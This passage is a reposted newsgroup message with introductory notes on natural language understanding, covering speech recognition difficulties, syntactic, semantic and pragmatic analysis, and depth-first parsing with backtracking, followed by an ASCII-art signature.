application. (For example, we might translate into a database query).
We'll also assume for now that the natural language in question is
English, though of course in general it might be any other language.

In general the user may communicate with the system by speaking or by
typing. Understanding spoken language is much harder than understanding
typed language - our input is just the raw speech signals (normally a plot
of how much energy is coming in at different frequencies at different
points in time). Before we can get to work on what the speech means we
must work out from the frequency spectrogram what words are being spoken.
This is very difficult to do in general. For a start different speakers
all have different voices and accents and individual speakers may
articulate differently on different occasion - so there's no simple
mapping from speech waveform to word. There may also be background noise,
so we have to separate the signals resulting from the wind wistling in the
trees from the signals resulting from Fred saying ``Hello''.

Even if the speech is very clear, it may be hard to work out what words
are spoken. There may be many different ways of splitting up a sentence
into words. In fluent speech there are generally virtually no pauses
between words, and the understanding system must guess where word breaks
are. As an example of this, consider the sentence ``how to recognise
speech''. If spoken quickly this might be misread as saying ``how to wreck
a nice beach''. And even if we get the word breaks right we may still not
know what words are spoken - some words sound similar (e.g., bear and
bare) and it may be impossible to tell which was meant without thinking
about the meaning of the sentence.

Because of all these problems a speech understanding system may come up
with a number of different alternative sequences of words, perhaps ranked
according to their likelihood. Any ambiguities as to what the words in the
sentence are (e.g., bear/bare) will be resolved when the system starts
trying to work out the meaning of the sentence.

Whether we start with speech signals or typed input, at some stage we'll
have a list (or lists) of words and will have to work out what they mean.
There are three main stages to this analysis:

Syntactic Analysis:
where we use grammatical rules describing the legal structure
of the language to obtain one or more parses of the sentence.

Semantic Analysis:
where we try and obtain an initial representation (or
representations) of the meaning of the sentence, given the
possible parses.

Pragmatic Analysis:
where we use additional contextual information to fill in gaps
in the meaning representation, and to work out what the speaker
was really getting at.

The remaining two stages of analysis, semantics and pragmatics, are
concerned with getting at the meaning of a sentence. In the first stage
(semantics) a partial representation of the meaning is obtained based on
the possible syntactic structure(s) of the sentence, and on the meanings
of the words in that sentence. In the second stage, the meaning is
elaborated based on contextual and world knowledge. To illustrate the
difference between these stages, consider the sentence:

From knowledge of the meaning of the words and the structure of the
sentence we can work out that someone (who is male) asked for someone who
is a boss. But we can't say who these people are and why the first guy
wanted the second. If we know something about the context (including the
last few sentences spoken/written) we may be able to work these things
out. Maybe the last sentence was ``Fred had just been sacked.'', and we
know from our general knowledge that bosses generally sack people and if
people want to speak to people who sack them it is generally to complain
about it. We could then really start to get at the meaning of the sentence
- Fred wants to complain to his boss about getting sacked.

A natural language grammar specifies allowable sentence structures in
terms of basic syntactic categories such as nouns and verbs, and allows us
to determine the structure of the sentence. It is defined in a similar way
to a grammar for a programming language, though tends to be more complex,
and the notations used are somewhat different. Because of the complexity
of natural language a given grammar is unlikely to cover all possible
syntactically acceptable sentences.

Having a grammar isn't enough to parse natural language - you need a
parser. The parser should search for possible ways the rules of the
grammar can be used to parse the sentence - so parsing can be viewed as a
kind of search problem[LINK]. In general there may be many different rules
that can be used to ``expand'' or rewrite a given syntactic category, and
the parser must check through them all, to see if the sentence can be
parsed using them. For example, in our mini-grammar above there were two
rules for noun_phrases: a parse of the sentence may use either one or the
other. In fact we can view the grammar as defining an AND-OR tree to
search: alternative ways of expanding a node give OR branches, while rules
with more than one syntactic category on the right hand side give AND
branches.

So, to parse a sentence we need to search through all these possibilities,
effectively going through all possible syntactic structures to find one
that fits the sentence. There are good ways and bad ways of doing this,
just as there are good and bad ways of parsing programming languages. One
way is basically to do a depth first search through the parse tree. When
you reach the first terminal node in the grammar (ie, a primitive
syntactic category, such as noun) you check whether the first word of the
sentence belongs to this category (e.g., is a noun). If it is, then you
continue the parse with the rest of the sentence. If it isn't you
backtrack and try alternative grammar rules.

You might start off expanding ``sentence'' to a verb phrase and a noun
phrase. Then the noun phrase would be expanded to give a determiner and a
noun, using the third rule. A determiner is a primitive syntactic category
(a terminal node in the grammar) so we check whether the first word (John)
belongs to that category. It doesn't - John is a proper noun - so we
backtrack and find another way of expanding ``noun_phrase'' and try the
fourth rule. Now, as John is a proper name this will work OK, so we
continue the parse with the rest of the sentence (``loves Mary''). We
haven't yet expanded verb phrase, so we try to parse ``loves Mary'' as a
verb phrase. This will eventually succeed, so the whole thing succeeds.

In general, the input to the semantic stage of analysis may be viewed as
being a set of possible parses of the sentence, and information about the
possible word meanings. The aim is to combine the word meanings, given
knowledge of the sentence structure, to obtain an initial representation
of the meaning of the whole sentence. The hard thing, in a sense, is to
represent word meanings in such a way that they may be combined with other
word meanings in a simple and general way.

To obtain a semantic representation it helps if you can combine the
meanings of the parts of the sentence in a simple way to get at the
meaning of the whole (The term compositional semantics refers to this
process). For those familiar with lambda expressions, one way to do this
is to represent word meanings as complex lambda expressions, and just use
function application to combine them.

Pragmatics is the last stage of analysis, where the meaning is elaborated
based on contextual and world knowledge. Contextual knowledge includes
knowledge of the previous sentences (spoken or written), general knowledge
about the world, and knowledge of the speaker.

.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
_____________
,o888b,`?88 Sol B. Descartes @ ZENCOR Technologics \ _ _ _ /
,8888 888 ?8 s...@psynet.net \ \ | / /
8888888P' 8 http://www.psynet.net/sol \ \|/ /
888P' 8 #ZENCOR \ | /
`88 O d8 Toronto, Ontario, Canada \ | /
`?._ _.o88 ZEN-CON Sundays @ Cafe.ORG \_/

.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.

0 new messages